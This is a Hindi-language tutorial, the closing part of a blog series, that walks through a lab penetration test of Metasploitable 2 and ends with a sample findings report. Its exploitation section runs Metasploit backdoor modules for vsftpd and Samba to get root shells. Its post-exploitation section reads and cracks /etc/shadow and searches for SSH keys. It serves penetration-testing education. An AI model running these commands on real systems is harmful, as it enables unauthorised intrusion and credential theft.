हैकर का मार्ग: 5-भाग श्रृंखला
भाग 1: परिचय → भाग 2: Flipper में महारत → भाग 3: Kali की बुनियाद → भाग 4: एक्सप्लॉइटेशन → भाग 5: पूर्ण ऑडिट
आपने यह श्रृंखला यह सोचते हुए शुरू की कि हैकर्स वास्तव में क्या करते हैं। आपने सीखा कि यह हुडी और हरे टेक्स्ट के बारे में नहीं है। यह व्यवस्थित समस्या-समाधान है। आपने बैज क्लोन किए, नेटवर्क मैप किए, handshakes कैप्चर किए और कमजोर मशीनों पर shells प्राप्त किए।
अब हम सब कुछ एक साथ जोड़ते हैं। यह लेख आपको एक काल्पनिक लक्ष्य के खिलाफ एक पूर्ण पेनेट्रेशन टेस्ट के माध्यम से ले जाता है। हर चरण, हर निर्णय, हर खोज, ठीक वैसे ही प्रलेखित जैसे एक पेशेवर करेगा।
परिदृश्य
क्लाइंट: Initech Labs (एक काल्पनिक छोटी टेक कंपनी)
दायरा: आंतरिक नेटवर्क पेनेट्रेशन टेस्ट
लक्ष्य: कमजोरियों की पहचान करना और संभावित व्यापार प्रभाव प्रदर्शित करना
आपका लक्ष्य: आपका अपना लैब नेटवर्क (Kali + Metasploitable 2 + कोई अन्य VM जो आपने सेटअप किया)
एक कॉफी बनाएं। यह मजेदार होने वाला है।
चरण 1: पूर्व-संलग्नता
कीबोर्ड छूने से पहले, पेशेवर पेंटेस्टर व्यापार पक्ष को संभालते हैं। इसे छोड़ दें, और आप पेंटेस्टर नहीं हैं। आप बस अपराध कर रहे हैं।
स्कोपिंग कॉल
एक वास्तविक संलग्नता में, आप क्लाइंट से कॉल करेंगे:
- दायरे में क्या है? कौन से नेटवर्क, IP रेंज, एप्लिकेशन?
- दायरे से बाहर क्या है? प्रोडक्शन सिस्टम? तृतीय-पक्ष सेवाएं?
- टेस्टिंग विंडो? कब टेस्ट कर सकते हैं? केवल कार्य घंटे?
- संपर्क बिंदु? कुछ टूटे तो किसे कॉल करें?
- लक्ष्य? अनुपालन चेकबॉक्स या वास्तविक सुरक्षा सुधार?
आपकी लैब के लिए
दायरा: केवल आपका पृथक लैब नेटवर्क। दायरे से बाहर: बाकी सब कुछ। टेस्टिंग विंडो: जब चाहें। लक्ष्य: करके सीखना।
संलग्नता के नियम
वास्तविक संलग्नताओं में लिखित नियम होते हैं:
- प्राधिकरण पत्र - हस्ताक्षरित दस्तावेज जो साबित करता है कि आपके पास अनुमति है
- एस्केलेशन प्रक्रियाएं - अगर कुछ गंभीर मिले तो क्या करें
- डेटा हैंडलिंग - संवेदनशील डेटा कैसे संभालें
- सफाई आवश्यकताएं - समाप्त होने पर सभी टूल्स और बैकडोर हटाएं
- रिपोर्ट की समयसीमा - अंतिम रिपोर्ट कब देनी है?
हमेशा लिखित अनुमति प्राप्त करें
"दोस्ताना" टेस्ट के लिए भी। एक हस्ताक्षरित ईमेल जो कहता है "आपको मेरे नेटवर्क को तारीख से तारीख तक टेस्ट करने की अनुमति है" एक सीखने के अनुभव और आपराधिक सजा के बीच का अंतर हो सकता है। इसे गंभीरता से लें।
चरण 2: रिकनाइसेंस
लक्ष्य के बारे में सब कुछ जानने का समय। वास्तविक संलग्नता में, इसमें OSINT शामिल होगा: Google खोज, LinkedIn प्रोफाइल, कंपनी वेबसाइट, DNS रिकॉर्ड। हमारी लैब के लिए, हम सीधे सक्रिय रिकनाइसेंस पर जाते हैं।
कदम 1: नेटवर्क खोज
पहला सवाल: इस नेटवर्क पर क्या है?
1# अपनी नेटवर्क रेंज खोजें
2ip a | grep inet
3# कुछ ऐसा खोजें: inet 192.168.56.100/24
4
5# सभी लाइव होस्ट खोजें
6sudo nmap -sn 192.168.56.0/24 -oA discovery
7
8# परिणाम (उदाहरण):
9Nmap scan report for 192.168.56.1
10Host is up (0.00032s latency).
11Nmap scan report for 192.168.56.101
12Host is up (0.00089s latency).
13Nmap scan report for 192.168.56.102
14Host is up (0.00045s latency).सब कुछ प्रलेखित करें:
1# Initech Labs - नेटवर्क खोज
2# तिथि: 2026-03-08
3# परीक्षक: आपका नाम
4
5192.168.56.1 - Gateway/Router
6192.168.56.101 - अज्ञात (जांच करनी है)
7192.168.56.102 - अज्ञात (जांच करनी है)कदम 2: पोर्ट स्कैनिंग
अब गहराई में जाते हैं। कौन सी सेवाएं चल रही हैं?
1# सेवा पहचान के साथ पूर्ण पोर्ट स्कैन
2sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
3
4# सीखने के दौरान तेज परिणामों के लिए:
5sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101Metasploitable 2 पर, आपको खजाना दिखेगा:
1PORT STATE SERVICE VERSION
221/tcp open ftp vsftpd 2.3.4
322/tcp open ssh OpenSSH 4.7p1
423/tcp open telnet Linux telnetd
525/tcp open smtp Postfix smtpd
680/tcp open http Apache httpd 2.2.8
7139/tcp open netbios-ssn Samba smbd 3.X
8445/tcp open netbios-ssn Samba smbd 3.X
93306/tcp open mysql MySQL 5.0.51a
105432/tcp open postgresql PostgreSQL DB
11...क्या एक्सपोजर है। नोट्स अपडेट करें:
1192.168.56.101 - Linux Server (Metasploitable)
2 - FTP (21): vsftpd 2.3.4 # ज्ञात बैकडोर!
3 - SSH (22): OpenSSH 4.7p1 # प्राचीन
4 - Telnet (23): सक्रिय # 2026 में यह क्यों मौजूद है?
5 - HTTP (80): Apache 2.2.8 # वेब ऐप्स टेस्ट करने के लिए
6 - SMB (139/445): Samba 3.X # संभावित सोने की खान
7 - MySQL (3306): 5.0.51a # डेटाबेस एक्सेस?
8 - PostgreSQL (5432): सक्रिय # एक और DBकदम 3: कमजोरी पहचान
देखते हैं वास्तव में क्या एक्सप्लॉइट किया जा सकता है।
1# कमजोरी स्क्रिप्ट चलाएं
2sudo nmap --script vuln -oA vuln_scan 192.168.56.101
3
4# Metasploit में विशिष्ट सेवाएं जांचें
5msfconsole
6msf6 > search vsftpd
7msf6 > search samba 3
8msf6 > search apache 2.2vsftpd 2.3.4 बैकडोर तुरंत दिखता है। यह एक गारंटीड shell है। लेकिन एक अच्छा पेंटेस्टर पहली खोज पर नहीं रुकता। सब कुछ प्रलेखित करें।
चरण 3: एक्सप्लॉइटेशन
यहां चीजें रोमांचक होती हैं। हमारे पास कई संभावित प्रवेश बिंदु हैं। व्यवस्थित रूप से काम करें।
अटैक वेक्टर 1: FTP बैकडोर
1msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
2msf6 exploit(...) > set RHOSTS 192.168.56.101
3msf6 exploit(...) > exploit
4
5[*] Banner: 220 (vsFTPd 2.3.4)
6[*] USER: 331 Please specify the password.
7[+] Backdoor service has been spawned
8[+] Command shell session 1 opened
9
10whoami
11root
12
13id
14uid=0(root) gid=0(root)प्रलेखित खोज: FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।
लेकिन हम यहां नहीं रुकते। और क्या एक्सेस कर सकते हैं?
अटैक वेक्टर 2: Samba
1background
2
3msf6 > use exploit/multi/samba/usermap_script
4msf6 exploit(...) > set RHOSTS 192.168.56.101
5msf6 exploit(...) > exploit
6
7[*] Command shell session 2 opened
8
9whoami
10rootएक अलग वेक्टर के माध्यम से एक और root shell। पूर्ण समझौते के दो स्वतंत्र रास्ते।
अटैक वेक्टर 3: वेब एप्लिकेशन
देखते हैं पोर्ट 80 पर क्या चल रहा है।
1gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
2
3# परिणाम:
4/cgi-bin/ (Status: 403)
5/dav/ (Status: 301)
6/icons/ (Status: 301)
7/index (Status: 200)
8/phpMyAdmin/ (Status: 301)
9/phpinfo (Status: 200)
10/test/ (Status: 301)
11/twiki/ (Status: 301)
12
13nikto -h http://192.168.56.101डिफॉल्ट क्रेडेंशियल्स वाला phpMyAdmin? जांचें:
1Username: root
2Password: (खाली)
3
4# एक्सेस मिल गया!बिना पासवर्ड के डेटाबेस एडमिन एक्सेस। यहां से, हम सारा डेटा निकाल सकते हैं, रिकॉर्ड संशोधित कर सकते हैं या MySQL की फाइल ऑपरेशन का उपयोग करके web shell लिख सकते हैं।
अटैक वेक्टर 4: कमजोर SSH क्रेडेंशियल्स
1msf6 > use auxiliary/scanner/ssh/ssh_login
2msf6 auxiliary(...) > set RHOSTS 192.168.56.101
3msf6 auxiliary(...) > set USERNAME msfadmin
4msf6 auxiliary(...) > set PASSWORD msfadmin
5msf6 auxiliary(...) > run
6
7[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'कमजोर क्रेडेंशियल्स SSH एक्सेस देते हैं। Root नहीं, लेकिन पोस्ट-एक्सप्लॉइटेशन में संभालेंगे।
चरण 4: पोस्ट-एक्सप्लॉइटेशन
हमारे पास एक्सेस है। अब क्या? एक वास्तविक पेनेट्रेशन टेस्ट व्यापार प्रभाव प्रदर्शित करता है।
क्रेडेंशियल हार्वेस्टिंग
1cat /etc/shadow
2root:$1$xyz...truncated...:14889:0:99999:7:::
3msfadmin:$1$abc...truncated...:14889:0:99999:7:::
4user:$1$def...truncated...:14889:0:99999:7:::
5postgres:$1$ghi...truncated...:14889:0:99999:7:::
6
7cat /etc/passwd > /tmp/passwd.txt
8cat /etc/shadow > /tmp/shadow.txt
9
10unshadow passwd.txt shadow.txt > combined.txt
11john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtनेटवर्क रिकनाइसेंस (अंदर से)
1ifconfig
2route -n
3cat /etc/hosts
4arp -a
5
6netstat -tulpn
7ss -tulpn
8
9find / -name "id_rsa" 2>/dev/null
10find / -name "authorized_keys" 2>/dev/nullसंवेदनशील डेटा की खोज
1find / -name "*.conf" 2>/dev/null | head -20
2find / -name "*.sql" 2>/dev/null
3find / -name "*.bak" 2>/dev/null
4find / -name "*password*" 2>/dev/null
5
6cat /var/www/*/config.php 2>/dev/null
7cat /etc/mysql/my.cnf
8
9mysql -u root -p
10mysql> SHOW DATABASES;
11mysql> SELECT * FROM mysql.user;प्रिविलेज एस्केलेशन (msfadmin से)
msfadmin के रूप में SSH लॉगिन याद है? भाग 4 में सीखे गए का उपयोग करके root तक बढ़ें।
1ssh [email protected]
2sudo -l
3find / -perm -4000 2>/dev/null
4cat /etc/crontabचरण 5: प्रलेखन और निष्कर्ष
रिपोर्ट के बिना टेस्ट बेकार है। यह पेशेवरों को script kiddies से अलग करता है।
निष्कर्षों का सारांश
"Initech Labs" नेटवर्क पर हमने जो पाया, वास्तविक रिपोर्ट के प्रारूप में:
गंभीर: FTP सेवा बैकडोर (CVE-2011-2523)
प्रभावित सिस्टम: 192.168.56.101
जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन
प्रमाण: 60 सेकंड से कम में पूर्ण root shell प्राप्त
सिफारिश: vsftpd को तुरंत वर्तमान संस्करण में अपडेट करें या FTP सेवा पूरी तरह बंद करें।
गंभीर: Samba रिमोट कोड निष्पादन
प्रभावित सिस्टम: 192.168.56.101
जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन
प्रमाण: usermap_script exploit के माध्यम से पूर्ण root shell प्राप्त
सिफारिश: Samba को वर्तमान संस्करण में अपडेट करें। SMB एक्सेस केवल आवश्यक सिस्टम तक सीमित करें।
उच्च: बिना पासवर्ड MySQL Root एक्सेस
प्रभावित सिस्टम: 192.168.56.101
जोखिम: पूर्ण डेटाबेस समझौता, डेटा चोरी, web shell परिनियोजन
प्रमाण: phpMyAdmin के माध्यम से खाली पासवर्ड से root के रूप में लॉगिन
सिफारिश: मजबूत root पासवर्ड सेट करें। phpMyAdmin एक्सेस प्रतिबंधित करें।
उच्च: कमजोर SSH क्रेडेंशियल्स
प्रभावित सिस्टम: 192.168.56.101
जोखिम: प्रमाणित एक्सेस जो प्रिविलेज एस्केलेशन की ओर ले जाता है
प्रमाण: msfadmin:msfadmin सफलतापूर्वक प्रमाणित
सिफारिश: मजबूत पासवर्ड नीति लागू करें। SSH कुंजी-आधारित प्रमाणीकरण लागू करें।
मध्यम: Telnet सेवा सक्षम
प्रभावित सिस्टम: 192.168.56.101
जोखिम: क्रेडेंशियल्स सादे पाठ में प्रेषित
सिफारिश: Telnet बंद करें। सभी रिमोट प्रशासन के लिए SSH का उपयोग करें।
निम्न: उजागर phpinfo() पेज
प्रभावित सिस्टम: 192.168.56.101
सिफारिश: phpinfo पेज हटाएं या एक्सेस प्रतिबंधित करें।
कार्यकारी सारांश
कार्यकारी सारांश
Initech Labs के आंतरिक नेटवर्क के पेनेट्रेशन टेस्ट के दौरान, सुरक्षा टीम ने मूल्यांकन शुरू करने के 10 मिनट के भीतर मुख्य सर्वर का पूर्ण प्रशासनिक नियंत्रण प्राप्त किया।
प्रमुख निष्कर्ष:
- 2 गंभीर कमजोरियां जो तुरंत रिमोट टेकओवर की अनुमति देती हैं
- 2 उच्च-गंभीरता मुद्दे जो डेटाबेस और उपयोगकर्ता क्रेडेंशियल्स उजागर करते हैं
- कई मध्यम और निम्न निष्कर्ष जो प्रणालीगत सुरक्षा अंतराल दर्शाते हैं
निष्कर्ष: बुनियादी कौशल वाला हमलावर इस सिस्टम को मिनटों में पूरी तरह समझौता कर सकता है। सभी गंभीर और उच्च निष्कर्षों के लिए तत्काल उपचार आवश्यक है।
चरण 6: सफाई और समापन
एक पेशेवर पेंटेस्टर वातावरण को ठीक वैसे ही छोड़ता है जैसा उसने पाया।
1msf6 > sessions -l
2msf6 > sessions -K
3
4rm /tmp/linpeas.sh
5rm /tmp/*.txt
6userdel testuser
7rm /home/*/.ssh/authorized_keysवास्तविक संलग्नता में, आप यह भी करेंगे:
- टेस्टिंग के दौरान अपलोड किए गए सभी टूल्स हटाएं
- वातावरण में किए गए किसी भी बदलाव को प्रलेखित करें
- निकाले गए डेटा के hashes/checksums प्रदान करें
- रिपोर्ट वितरण के बाद सभी क्लाइंट डेटा सुरक्षित रूप से हटाएं
पूर्ण कार्यप्रणाली चेकलिस्ट
किसी भी पेनेट्रेशन टेस्ट के लिए आपका पुन: प्रयोज्य वर्कफ़्लो:
पेनेट्रेशन टेस्ट कार्यप्रणाली
- पूर्व-संलग्नता
- दायरा और संलग्नता नियम परिभाषित करें
- लिखित प्राधिकरण प्राप्त करें
- संचार चैनल स्थापित करें
- परीक्षण वातावरण सेटअप करें
- रिकनाइसेंस
- नेटवर्क खोज (होस्ट एन्यूमरेशन)
- पोर्ट स्कैनिंग और सेवा पहचान
- कमजोरी स्कैनिंग
- वेब एप्लिकेशन एन्यूमरेशन
- सब कुछ प्रलेखित करें
- एक्सप्लॉइटेशन
- कमजोरियों को मान्य करें (स्कैनर पर आंख बंद करके भरोसा न करें)
- पुष्टि की गई कमजोरियों का शोषण करें
- हर सफल समझौते को प्रलेखित करें
- साक्ष्य कैप्चर करें (स्क्रीनशॉट, लॉग)
- पोस्ट-एक्सप्लॉइटेशन
- समझौता किए गए सिस्टम की गणना करें
- क्रेडेंशियल्स इकट्ठा करें
- संवेदनशील डेटा की पहचान करें
- प्रिविलेज एस्केलेशन का प्रयास करें
- लेटरल मूवमेंट के अवसर खोजें
- रिपोर्टिंग
- कार्यकारी सारांश लिखें (व्यापार प्रभाव)
- सभी निष्कर्ष साक्ष्य के साथ प्रलेखित करें
- उपचार सिफारिशें प्रदान करें
- IT टीमों के लिए तकनीकी विवरण शामिल करें
- सफाई
- सभी टूल्स और आर्टिफैक्ट्स हटाएं
- सभी सत्र और बैकडोर बंद करें
- वातावरण बदलाव प्रलेखित करें
- क्लाइंट डेटा सुरक्षित रूप से संभालें
आगे क्या: आपका मार्ग
आपने हैकर का मार्ग पूरा कर लिया। आप "हैकिंग का मतलब क्या है?" से पूर्ण पेनेट्रेशन टेस्ट करने तक पहुंचे। यह वास्तव में प्रभावशाली है।
लेकिन यह बस शुरुआत है। यहां से आगे जाएं:
अभ्यास प्लेटफॉर्म
- Hack The Box - अभ्यास के लिए यथार्थवादी मशीनें। "आसान" रिटायर्ड बॉक्स से शुरू करें।
- TryHackMe - निर्देशित सीखने के रास्ते।
- VulnHub - डाउनलोड और स्थानीय अभ्यास के लिए मुफ्त कमजोर VMs।
- PentesterLab - वेब एप्लिकेशन सुरक्षा पर केंद्रित।
प्रमाणपत्र (यदि चाहें)
- eJPT - उत्कृष्ट शुरुआती बिंदु, व्यावहारिक परीक्षा
- OSCP - उद्योग मानक, कठिन लेकिन सम्मानित
- PNPT - आधुनिक, व्यावहारिक, रिपोर्ट लेखन शामिल
- CEH - कॉर्पोरेट आवश्यकताओं के लिए, कम व्यावहारिक
विशेषज्ञताएं
- वेब एप्लिकेशन सुरक्षा - OWASP, Burp Suite, SQL injection, XSS
- Active Directory - अधिकांश कॉर्पोरेट वातावरण इसका उपयोग करते हैं
- क्लाउड सुरक्षा - AWS, Azure, GCP पेंटेस्टिंग
- मोबाइल सुरक्षा - Android/iOS एप्लिकेशन परीक्षण
- Red Teaming - पूर्ण विरोधी सिमुलेशन, भौतिक + डिजिटल
- रिवर्स इंजीनियरिंग - मालवेयर विश्लेषण, एक्सप्लॉइट विकास
अपनी होम लैब बनाएं
सबसे अच्छे पेंटेस्टर्स के पास विस्तृत होम लैब होती हैं। सरल शुरू करें:
- Active Directory के साथ Windows Server जोड़ें
- Domain controller सेटअप करें
- कमजोर वेब एप्लिकेशन परिनियोजित करें (DVWA, bWAPP, WebGoat)
- कई सेगमेंट के साथ नेटवर्क बनाएं
- रक्षक के दृष्टिकोण से हमले देखने के लिए HoneyAegis जोड़ें
हैकर का मार्ग: पूर्ण
आपने यह कर दिया। सभी पांच भाग, जिज्ञासु से सक्षम तक।
भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियाद भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट
श्रृंखला पूर्ण - आपकी यात्रा
भाग 1: आपने सीखा कि हैकिंग वास्तव में क्या है और Flipper Zero के साथ अपनी पहली जीत हासिल की
भाग 2: आपने हर Flipper प्रोटोकॉल में महारत हासिल की: Sub-GHz, RFID, NFC, BadUSB, GPIO
भाग 3: आपने अपनी Kali लैब बनाई, nmap सीखा और WiFi handshakes कैप्चर किए
भाग 4: आपने Metasploit, एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन और pivoting में महारत हासिल की
भाग 5: आपने सब कुछ एक पूर्ण पेनेट्रेशन टेस्टिंग कार्यप्रणाली में जोड़ दिया
सुरक्षा एक गंतव्य नहीं है। यह एक अभ्यास है। उपकरण बदलेंगे, कमजोरियां विकसित होंगी, लेकिन कार्यप्रणाली वही रहती है। सब कुछ पर सवाल उठाएं। सब कुछ प्रलेखित करें। सीखना कभी बंद न करें।
दूसरी तरफ आपका स्वागत है।
- Lee